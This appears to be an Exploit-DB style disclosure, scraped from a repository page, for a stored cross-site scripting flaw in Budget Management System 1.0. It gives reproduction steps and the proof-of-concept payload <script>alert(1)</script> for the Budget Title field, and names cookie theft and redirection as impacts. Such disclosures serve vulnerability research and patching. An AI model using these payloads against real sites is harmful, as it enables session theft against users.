e6cd1b38eb
9 changes to exploits/shellcodes Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption vsftpd 3.0.3 - Remote Denial of Service WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated) TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated) Concrete5 8.5.4 - 'name' Stored XSS Equipment Inventory System 1.0 - 'multiple' Stored XSS Budget Management System 1.0 - 'Budget title' Stored XSS Novel Boutique House-plus 3.5.1 - Arbitrary File Download SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow
17 lines
No EOL
634 B
Text
17 lines
No EOL
634 B
Text
# Exploit Title: Budget Management System 1.0 - 'Budget title' Stored XSS
|
|
# Exploit Author: Jitendra Kumar Tripathi
|
|
# Vendor Homepage: https://www.sourcecodester.com/
|
|
# Software Link: https://www.sourcecodester.com/php/14403/budget-management-system.html
|
|
# Version: 1
|
|
# Tested on Windows 10 + Xampp 8.0.3
|
|
|
|
XSS IMPACT:
|
|
1: Steal the cookie
|
|
2: User redirection to a malicious website
|
|
|
|
Vulnerable Parameters: Customer Details
|
|
|
|
*Steps to reproduce:*
|
|
Add Budget Title
|
|
Payload : <script>alert(1)</script>
|
|
Reload the http://localhost/Budget%20Management%20System/index.php or update the budget , the xss will get triggered. |